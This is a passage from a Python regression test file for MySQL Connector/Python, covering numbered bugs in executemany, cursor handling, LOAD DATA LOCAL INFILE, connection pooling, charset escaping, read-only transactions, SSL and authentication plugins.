"INSERT INTO BugOra16656621 (c1) VALUES ('a'),('b'),('c')")
self.cnx.commit()
cur.execute("SELECT * FROM BugOra16656621")
try:
self.cnx.rollback()
except mysql.connector.InternalError:
self.fail("Rollback not possible with unread results")
class BugOra16660356(tests.MySQLConnectorTests):
"""BUG#16660356: USING EXECUTEMANY WITH EMPTY DATA SHOULD DO NOTHING
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS bug16660356")
cur.execute(
"CREATE TABLE bug16660356 (id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB"
)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16660356")
cnx.close()
@foreach_cnx()
def test_executemany(self):
cur = self.cnx.cursor()
try:
cur.executemany(
"INSERT INTO bug16660356 (c1) VALUES (%s)", []
)
except mysql.connector.ProgrammingError:
self.fail("executemany raise ProgrammingError with empty data")
class BugOra17041240(tests.MySQLConnectorTests):
"""BUG#17041240: UNCLEAR ERROR CLOSING CURSOR WITH UNREAD RESULTS
"""
def setUp(self):
self.table_name = 'BugOra17041240'
self.data = [(1,), (2,), (3,)]
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cur.execute("CREATE TABLE {table} (c1 INT)".format(
table=self.table_name))
cur.executemany(
"INSERT INTO {table} (c1) VALUES (%s)".format(
table=self.table_name),
self.data)
cnx.commit()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cnx.close()
@foreach_cnx()
def test_cursor_close(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM {table} ORDER BY c1".format(
table=self.table_name))
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(self.data[1], cur.fetchone())
self.assertRaises(mysql.connector.InternalError, cur.close)
self.assertEqual(self.data[2], cur.fetchone())
@foreach_cnx()
def test_cursor_new(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM {table} ORDER BY c1".format(
table=self.table_name))
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(self.data[1], cur.fetchone())
self.assertRaises(mysql.connector.InternalError, self.cnx.cursor)
self.assertEqual(self.data[2], cur.fetchone())
class BugOra17065366(tests.MySQLConnectorTests):
"""BUG#17065366: EXECUTEMANY FAILS USING MYSQL FUNCTION FOR INSERTS
"""
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.table_name = 'BugOra17065366'
cur.execute(
"DROP TABLE IF EXISTS {table}".format(table=self.table_name))
cur.execute(
"CREATE TABLE {table} ( "
"id INT UNSIGNED NOT NULL AUTO_INCREMENT KEY, "
"c1 INT, c2 DATETIME) ENGINE=INNODB".format(table=self.table_name))
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(
table=self.table_name))
cnx.close()
@foreach_cnx()
def test_executemany(self):
self._setup()
cur = self.cnx.cursor()
adate = datetime(2012, 9, 30)
stmt = (
"INSERT INTO {table} (id, c1, c2) "
"VALUES (%s, %s, DATE('{date} 13:07:00'))"
"/* Using DATE() */ ON DUPLICATE KEY UPDATE c1 = id"
).format(table=self.table_name, date=adate.strftime('%Y-%m-%d'))
exp = [
(1, 0, datetime(2012, 9, 30, 0, 0)),
(2, 0, datetime(2012, 9, 30, 0, 0))
]
cur.executemany(stmt, [(None, 0), (None, 0)])
self.cnx.commit()
cur.execute("SELECT * FROM {table}".format(table=self.table_name))
rows = cur.fetchall()
self.assertEqual(exp, rows)
exp = [
(1, 1, datetime(2012, 9, 30, 0, 0)),
(2, 2, datetime(2012, 9, 30, 0, 0))
]
cur.executemany(stmt, [(1, 1), (2, 2)])
self.cnx.commit()
cur.execute("SELECT * FROM {table}".format(table=self.table_name))
rows = cur.fetchall()
self.assertEqual(exp, rows)
class BugOra16933795(tests.MySQLConnectorTests):
"""BUG#16933795: ERROR.MSG ATTRIBUTE DOES NOT CONTAIN CORRECT VALUE
"""
def test_error(self):
exp = "Some error message"
error = mysql.connector.Error(msg=exp, errno=-1024)
self.assertEqual(exp, error.msg)
exp = "Unknown MySQL error"
error = mysql.connector.Error(errno=2000)
self.assertEqual(exp, error.msg)
self.assertEqual("2000: " + exp, str(error))
class BugOra17022399(tests.MySQLConnectorTests):
"""BUG#17022399: EXECUTING AFTER CONNECTION CLOSED GIVES UNCLEAR ERROR
"""
@foreach_cnx()
def test_execute(self):
cur = self.cnx.cursor()
self.cnx.close()
try:
cur.execute("SELECT 1")
except (mysql.connector.OperationalError,
mysql.connector.ProgrammingError) as exc:
self.assertEqual(2055, exc.errno, 'Was: ' + str(exc))
@cnx_config(client_flags=[constants.ClientFlag.COMPRESS])
@foreach_cnx()
def test_execute_compressed(self):
cur = self.cnx.cursor()
self.cnx.close()
try:
cur.execute("SELECT 1")
except (mysql.connector.OperationalError,
mysql.connector.ProgrammingError) as exc:
self.assertEqual(2055, exc.errno, 'Was: ' + str(exc))
class BugOra16369511(tests.MySQLConnectorTests):
"""BUG#16369511: LOAD DATA LOCAL INFILE IS MISSING
"""
def setUp(self):
self.data_file = os.path.join('tests', 'data', 'local_data.csv')
def _setup(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
cnx.cmd_query(
"CREATE TABLE local_data (id int, c1 VARCHAR(6), c2 VARCHAR(6))")
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
cnx.close()
@foreach_cnx(allow_local_infile=True)
def test_load_csv(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT * FROM local_data")
exp = [
(1, 'c1_1', 'c2_1'), (2, 'c1_2', 'c2_2'),
(3, 'c1_3', 'c2_3'), (4, 'c1_4', 'c2_4'),
(5, 'c1_5', 'c2_5'), (6, 'c1_6', 'c2_6')]
self.assertEqual(exp, cur.fetchall())
@cnx_config(compress=True, allow_local_infile=True)
@foreach_cnx()
def test_load_csv_with_compress(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT * FROM local_data")
exp = [
(1, 'c1_1', 'c2_1'), (2, 'c1_2', 'c2_2'),
(3, 'c1_3', 'c2_3'), (4, 'c1_4', 'c2_4'),
(5, 'c1_5', 'c2_5'), (6, 'c1_6', 'c2_6')]
self.assertEqual(exp, cur.fetchall())
@foreach_cnx(allow_local_infile=True)
def test_filenotfound(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
try:
cur.execute(sql, (self.data_file + '_spam',))
except (errors.InterfaceError, errors.DatabaseError) as exc:
self.assertTrue(
'not found' in str(exc) or 'could not be read' in str(exc),
'Was: ' + str(exc))
class BugOra17002411(tests.MySQLConnectorTests):
"""BUG#17002411: LOAD DATA LOCAL INFILE FAILS WITH BIGGER FILES
"""
def setUp(self):
self.data_file = os.path.join('tests', 'data', 'local_data_big.csv')
self.exp_rows = 33000
with open(self.data_file, 'w') as fp:
i = 0
while i < self.exp_rows:
fp.write("{0}\t{1}\n".format('a' * 255, 'b' * 255))
i += 1
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS local_data")
cur.execute(
"CREATE TABLE local_data ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(255), c2 VARCHAR(255))"
)
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
os.unlink(self.data_file)
cnx.close()
@foreach_cnx(allow_local_infile=True)
def test_load_csv(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data (c1, c2)"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT COUNT(*) FROM local_data")
self.assertEqual(self.exp_rows, cur.fetchone()[0])
@unittest.skipIf(tests.MYSQL_VERSION >= (8, 0, 1),
"BugOra17422299 not tested with MySQL version >= 8.0.1")
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 1),
"BugOra17422299 not tested with MySQL version 5.6")
class BugOra17422299(tests.MySQLConnectorTests):
"""BUG#17422299: cmd_shutdown fails with malformed connection packet
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.mysql_server = tests.MYSQL_SERVERS[0]
def tearDown(self):
self.ensure_up()
def ensure_up(self):
# Start the MySQL server again
if not self.mysql_server.check_running():
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("Failed restarting MySQL server after test")
def test_shutdown(self):
for cnx_class in self.all_cnx_classes:
self.ensure_up()
cnx = cnx_class(**self.config)
try:
cnx.cmd_shutdown()
except mysql.connector.DatabaseError as err:
self.fail("COM_SHUTDOWN failed: {0}".format(err))
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down after COM_SHUTDOWN")
    def test_shutdown_with_type(self):
for cnx_class in self.all_cnx_classes:
self.ensure_up()
cnx = cnx_class(**self.config)
try:
cnx.cmd_shutdown(
constants.ShutdownType.SHUTDOWN_WAIT_ALL_BUFFERS)
except mysql.connector.DatabaseError as err:
self.fail("COM_SHUTDOWN failed: {0}".format(err))
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down after COM_SHUTDOWN")
class BugOra17215197(tests.MySQLConnectorTests):
"""BUG#17215197: MYSQLCONNECTION.CURSOR(PREPARED=TRUE) NOT POSSIBLE
"""
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra17215197")
cur.execute("CREATE TABLE BugOra17215197 (c1 INT, c2 INT)")
cur.executemany("INSERT INTO BugOra17215197 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
cnx.commit()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS BugOra17215197")
@foreach_cnx()
def test_prepared_argument(self):
self._setup()
cur = self.cnx.cursor(prepared=True)
prep_stmt = "SELECT * FROM BugOra17215197 WHERE c1 = %s AND c2 = %s"
exp = [(1, 10)]
cur.execute(prep_stmt, (1, 10))
self.assertEqual(exp, cur.fetchall())
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra17414258(tests.MySQLConnectorTests):
"""BUG#17414258: IT IS ALLOWED TO CHANGE SIZE OF ACTIVE POOL
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['pool_name'] = 'test'
self.config['pool_size'] = 3
if tests.MYSQL_VERSION < (5, 7):
self.config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
def tearDown(self):
# Remove pools created by test
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
def test_poolsize(self):
cnx = mysql.connector.connect(**self.config)
cnx.close()
newconfig = self.config.copy()
newconfig['pool_size'] = self.config['pool_size'] + 1
self.assertRaises(mysql.connector.PoolError,
mysql.connector.connect, **newconfig)
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class Bug17578937(tests.MySQLConnectorTests):
"""CONNECTION POOL DOES NOT HANDLE A NOT AVAILABLE MYSQL SERVER"""
def setUp(self):
self.mysql_server = tests.MYSQL_SERVERS[0]
def tearDown(self):
# Start the MySQL server again
if not self.mysql_server.check_running():
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("Failed restarting MySQL server after test")
def test_get_connection(self):
"""Test reconnect once MySQL server is back
To make the test case simpler, we create a pool which only has
        one connection in the queue. This way we can simulate getting a
connection from a pool for which the MySQL server is not running.
"""
config = tests.get_mysql_config().copy()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
config['connection_timeout'] = 2
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, **config)
pcnx = cnxpool.get_connection()
self.assertTrue(isinstance(pcnx, pooling.PooledMySQLConnection))
pcnx.close()
self.mysql_server.stop()
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down; can not continue test")
self.assertRaises(errors.InterfaceError, cnxpool.get_connection)
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("MySQL started; can not continue test")
pcnx = cnxpool.get_connection()
pcnx.close()
class BugOra17079344(tests.MySQLConnectorTests):
"""BUG#17079344: ERROR WITH GBK STRING WITH CHARACTERS ENCODED AS BACKSLASH
"""
def setUp(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40)"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset)
cur.execute(table)
cnx.commit()
cur.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = self.cnx.__class__(**config)
tablename = charset + 'test'
cur = self.cnx.cursor()
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
for value in data:
cur.execute(insert, (value,))
self.cnx.commit()
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur:
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
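    # The test data below includes characters whose gbk/sjis/big5 encodings
    # can contain the 0x5C ('\') byte, which naive escaping treats as a
    # backslash escape (the regression described in the bug title).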
@foreach_cnx()
def test_gbk(self):
self._test_charset('gbk', [u'赵孟頫', u'赵\孟\頫\\', u'遜', ])
@foreach_cnx()
def test_sjis(self):
self._test_charset('sjis', ['\u005c'])
@foreach_cnx()
def test_big5(self):
self._test_charset('big5', ['\u5C62'])
class BugOra17780576(tests.MySQLConnectorTests):
"""BUG#17780576: CHARACTER SET 'UTF8MB4' UNSUPPORTED
"""
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS utf8mb4test")
cur.close()
cnx.close()
@foreach_cnx()
def test_utf8mb4(self):
if tests.MYSQL_VERSION < (5, 5, 0):
# Test only valid for MySQL 5.5.0 and later.
return
config = tests.get_mysql_config()
tablename = 'utf8mb4test'
self.cnx.set_charset_collation('utf8mb4', 'utf8mb4_general_ci')
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40) CHARACTER SET 'utf8mb4'"
") CHARACTER SET 'utf8mb4'"
).format(table=tablename)
cur.execute(table)
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
data = [u'😉😍', u'😃😊', u'😄😘😚', ]
for value in data:
cur.execute(insert, (value,))
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur:
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
class BugOra17573172(tests.MySQLConnectorTests):
"""BUG#17573172: MISSING SUPPORT FOR READ-ONLY TRANSACTIONS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS BugOra17573172")
self.cur.execute("CREATE TABLE BugOra17573172 (c1 INT, c2 INT)")
self.cur.executemany("INSERT INTO BugOra17573172 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
self.cnx.commit()
def test_read_only(self):
if self.cnx.get_server_version() < (5, 6, 5):
self.assertRaises(ValueError, self.cnx.start_transaction,
readonly=True)
else:
self.cnx.start_transaction(readonly=True)
self.assertTrue(self.cnx.in_transaction)
self.assertRaises(errors.ProgrammingError,
self.cnx.start_transaction)
query = "INSERT INTO BugOra17573172 VALUES(4, 40)"
self.assertRaises(errors.ProgrammingError, self.cur.execute, query)
self.cnx.rollback()
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS BugOra17573172")
self.cur.close()
class BugOra17826833(tests.MySQLConnectorTests):
"""BUG#17826833: EXECUTEMANY() FOR INSERTS W/O VALUES
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.emp_tbl = 'Bug17826833_emp'
self.cursor.execute("DROP TABLE IF EXISTS %s" % (self.emp_tbl))
self.city_tbl = 'Bug17826833_city'
self.cursor.execute("DROP TABLE IF EXISTS %s" % (self.city_tbl))
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`name` varchar(20) NOT NULL , "
"`phone` varchar(20), "
"PRIMARY KEY (`id`))" % (self.emp_tbl))
self.cursor.execute(create)
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`name` varchar(20) NOT NULL, "
"PRIMARY KEY (`id`))" % (self.city_tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS {0}".format(self.city_tbl))
self.cursor.execute("DROP TABLE IF EXISTS {0}".format(self.emp_tbl))
def test_executemany(self):
stmt = "INSERT INTO {0} (id,name) VALUES (%s,%s)".format(
self.city_tbl)
self.cursor.executemany(stmt, [(1, 'ABC'), (2, 'CDE'), (3, 'XYZ')])
query = ("INSERT INTO %s (id, name, phone)"
"SELECT id,name,%%s FROM %s WHERE name=%%s") % (self.emp_tbl,
self.city_tbl)
try:
self.cursor.executemany(query, [('4567', 'CDE'), ('1234', 'XYZ')])
stmt = "SELECT * FROM {0}".format(self.emp_tbl)
self.cursor.execute(stmt)
self.assertEqual([(2, 'CDE', '4567'), (3, 'XYZ', '1234')],
self.cursor.fetchall(), "INSERT ... SELECT failed")
except errors.ProgrammingError as err:
self.fail("Regular expression fails with executemany(): %s" %
err)
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra18040042(tests.MySQLConnectorTests):
"""BUG#18040042: Reset session closing pooled Connection"""
def test_clear_session(self):
pool_config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
pool_config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, **pool_config)
pcnx = cnxpool.get_connection()
exp_session_id = pcnx.connection_id
pcnx.cmd_query("SET @ham = 2")
pcnx.close()
pcnx = cnxpool.get_connection()
pcnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, pcnx.connection_id)
self.assertNotEqual(('2',), pcnx.get_rows()[0][0])
def test_do_not_clear_session(self):
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, pool_reset_session=False,
**tests.get_mysql_config())
pcnx = cnxpool.get_connection()
exp_session_id = pcnx.connection_id
pcnx.cmd_query("SET @ham = 2")
pcnx.close()
pcnx = cnxpool.get_connection()
pcnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, pcnx.connection_id)
self.assertEqual((2,), pcnx.get_rows()[0][0])
class BugOra17965619(tests.MySQLConnectorTests):
"""BUG#17965619: CALLPROC FUNCTION WITH BYTES PARAMETERS
"""
def setUp(self):
self.cnx = connection.MySQLConnection(**tests.get_mysql_config())
procedure = ("DROP PROCEDURE IF EXISTS `proce_with_binary`")
self.cnx.cmd_query(procedure)
procedure = ("CREATE PROCEDURE `proce_with_binary` "
"(data VARBINARY(512)) BEGIN END;")
self.cnx.cmd_query(procedure)
def tearDown(self):
procedure = ("DROP PROCEDURE IF EXISTS `proce_with_binary`")
self.cnx.cmd_query(procedure)
self.cnx.close()
def test_callproc(self):
cur = self.cnx.cursor()
data = b'\xf0\xf1\xf2'
output = cur.callproc('proce_with_binary', ((data, 'BINARY'),))
self.assertEqual((data,), output)
cur.close()
class BugOra17054848(tests.MySQLConnectorTests):
"""BUG#17054848: USE OF SSL SHOULD NOT REQUIRE SSL_CERT AND SSL_KEY
"""
def setUp(self):
config = tests.get_mysql_config()
self.admin_cnx = connection.MySQLConnection(**config)
if tests.MYSQL_VERSION < (5, 7, 21):
self.admin_cnx.cmd_query(
"GRANT ALL ON %s.* TO 'ssluser'@'%s' REQUIRE SSL" % (
config['database'], config['host']))
else:
self.admin_cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
def tearDown(self):
config = tests.get_mysql_config()
self.admin_cnx.cmd_query("DROP USER 'ssluser'@'%s'" % (
config['host']))
def test_ssl(self):
if not tests.SSL_AVAILABLE:
tests.MESSAGES['WARNINGS'].append(
"BugOra16217667 test failed. Python lacks SSL support.")
return
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
config = tests.get_mysql_config()
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket'] = None
config['ssl_verify_cert'] = False
config.update({
'ssl_ca': ssl_ca,
'ssl_cipher': 'AES256-SHA',
})
try:
cnx = connection.MySQLConnection(**config)
except errors.ProgrammingError:
self.fail("Failed authentication with SSL")
cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
        res = cnx.get_rows()[0][0]
        # res is the ('Ssl_cipher', value) row; the cipher value must not be empty
        self.assertTrue(res[1])
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0),
"BugOra16217765 not tested with MySQL version < 5.6.7. "
"Not working with cross version MySQL lib< 8.0.")
class BugOra16217765(tests.MySQLConnectorTests):
"""BUG#16217765: Fix authentication plugin support
"""
users = {
'sha256user': {
'username': 'sha256user',
'password': 'sha256P@ss',
'auth_plugin': 'sha256_password',
},
'nativeuser': {
'username': 'nativeuser',
'password': 'nativeP@ss',
'auth_plugin': 'mysql_native_password',
},
'sha256user_np': {
'username': 'sha256user_np',
'password': '',
'auth_plugin': 'sha256_password',
},
'nativeuser_np': {
'username': 'nativeuser_np',
'password': '',
'auth_plugin': 'mysql_native_password',
},
}
def _create_user(self, cnx, user, password, host, database,
plugin):
self._drop_user(cnx, user, host)
create_user = ("CREATE USER '{user}'@'{host}' "
"IDENTIFIED WITH {plugin}")
cnx.cmd_query(create_user.format(user=user, host=host, plugin=plugin))
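        # old_passwords selects the hashing used when setting the password
        # below: 2 for sha256_password accounts, 0 for mysql_native_password.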
if tests.MYSQL_VERSION[0:3] < (8, 0, 5):
if plugin == 'sha256_password':
cnx.cmd_query("SET old_passwords = 2")
else:
cnx.cmd_query("SET old_passwords = 0")
if tests.MYSQL_VERSION < (5, 7, 5):
passwd = ("SET PASSWORD FOR '{user}'@'{host}' = "
"PASSWORD('{password}')").format(user=user, host=host,
password=password)
else:
passwd = ("ALTER USER '{user}'@'{host}' IDENTIFIED BY "
"'{password}'").format(user=user, host=host,
password=password)
cnx.cmd_query(passwd)
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
cnx.cmd_query(grant.format(database=database, user=user, host=host))
def _drop_user(self, cnx, user, host):
try:
self.admin_cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=user))
except errors.DatabaseError:
# It's OK when drop fails
pass
def setUp(self):
self.errmsg = "AuthPlugin {0} failed: {1}"
config = tests.get_mysql_config()
self.host = config['host']
self.admin_cnx = connection.MySQLConnection(**config)
for key, user in self.users.items():
self._create_user(self.admin_cnx, user['username'],
user['password'],
self.host,
config['database'],
plugin=user['auth_plugin'])
def tearDown(self):
for key, user in self.users.items():
self._drop_user(self.admin_cnx, user['username'], self.host)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 6),
"MySQL {0} does not support sha256_password auth".format(
tests.MYSQL_VERSION_TXT))
@unittest.skipIf(
not tests.SSL_AVAILABLE,
"BugOra16217765.test_sha256 test skipped: SSL support not available")
def test_sha256(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config.update({
'ssl_ca': tests.SSL_CA,
'ssl_cert': tests.SSL_CERT,
'ssl_key': tests.SSL_KEY,
'ssl_cipher': 'AES256-SHA',
})
user = self.users['sha256user']
config['user'] = user['username']
config['password'] = user['password']
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH,
-constants.ClientFlag.CONNECT_ARGS]
config['auth_plugin'] = user['auth_plugin']
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
import traceback
traceback.print_exc()
self.fail(self.errmsg.format(config['auth_plugin'], exc))
try:
cnx.cmd_change_user(config['user'], config['password'])
except:
self.fail("Changing user using sha256_password auth failed "
"with pure Python connector. \nflags on cnx: {} \n"
"".format(config['client_flags']))
if CMySQLConnection:
try:
cnx = CMySQLConnection(**config)
except Exception as exc:
import traceback
traceback.print_exc()
self.fail(self.errmsg.format(config['auth_plugin'], exc))
try:
cnx.cmd_change_user(config['user'], config['password'])
except:
self.fail("Changing user using sha256_password auth failed "
"with CExtension")
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 6),
"MySQL {0} does not support sha256_password auth".format(
tests.MYSQL_VERSION_TXT))
def test_sha256_nonssl(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config['ssl_disabled'] = True
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH]
user = self.users['sha256user']
config['user'] = user['username']
config['password'] = user['password']
config['auth_plugin'] = user['auth_plugin']
self.assertRaises(errors.InterfaceError, connection.MySQLConnection,
**config)
if CMySQLConnection:
self.assertRaises(errors.InterfaceError, CMySQLConnection, **config)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 5, 7),
"MySQL {0} does not support authentication plugins".format(
tests.MYSQL_VERSION_TXT))
def test_native(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
user = self.users['nativeuser']
config['user'] = user['username']
config['password'] = user['password']
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH]
config['auth_plugin'] = user['auth_plugin']
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
self.fail(self.errmsg.format(config['auth_plugin'], exc))
if CMySQLConnection:
try:
cnx = CMySQLConnection(**config)
except Exception as exc:
self.fail(self.errmsg.format(config['auth_plugin'], exc))
class BugOra18144971(tests.MySQLConnectorTests):
"""BUG#18144971 ERROR WHEN USING UNICODE ARGUMENTS IN PREPARED STATEMENT"""
def setUp(self):
self.table = 'Bug18144971'
self.table_cp1251 = 'Bug18144971_cp1251'
def _setup(self):
config = tests.get_mysql_config()
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
create = ("CREATE TABLE {0} ( "
"`id` int(11) NOT NULL, "
"`name` varchar(40) NOT NULL , "
"`phone` varchar(40), "
"PRIMARY KEY (`id`))"
" CHARACTER SET 'utf8'".format(self.table))
cur.execute(create)
cur.execute(
"DROP TABLE IF EXISTS {0}".format(self.table_cp1251)
)
create = ("CREATE TABLE {0} ( "
"`id` int(11) NOT NULL, "
"`name` varchar(40) NOT NULL , "
"`phone` varchar(40), "
"PRIMARY KEY (`id`))"
" CHARACTER SET 'cp1251'".format(self.table_cp1251))
cur.execute(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_cp1251))
@cnx_config(use_unicode=True)
@foreach_cnx()
def test_prepared_statement(self):
self._setup()
cur = self.cnx.cursor(prepared=True)
stmt = "INSERT INTO {0} VALUES (?,?,?)".format(
self.table)
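        # With use_unicode=True both bytes and unicode parameters are expected
        # to round-trip as (unicode) str values, as reflected in 'exp'.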
data = [(1, b'bytes', '1234'), (2, u'aaaаффф', '1111')]
exp = [(1, 'bytes', '1234'), (2, u'aaaаффф', '1111')]
cur.execute(stmt, data[0])
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(self.table))
self.assertEqual(cur.fetchall(), [exp[0]])
config = tests.get_mysql_config()
config['charset'] = 'cp1251'
self.cnx = self.cnx.__class__(**config)
cur = self.cnx.cursor(prepared=True)
stmt = "INSERT INTO {0} VALUES (?,?,?)".format(
self.table_cp1251)
cur.execute(stmt, data[1])
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(self.table_cp1251))
self.assertEqual(cur.fetchall(), [exp[1]])
class BugOra18389196(tests.MySQLConnectorTests):
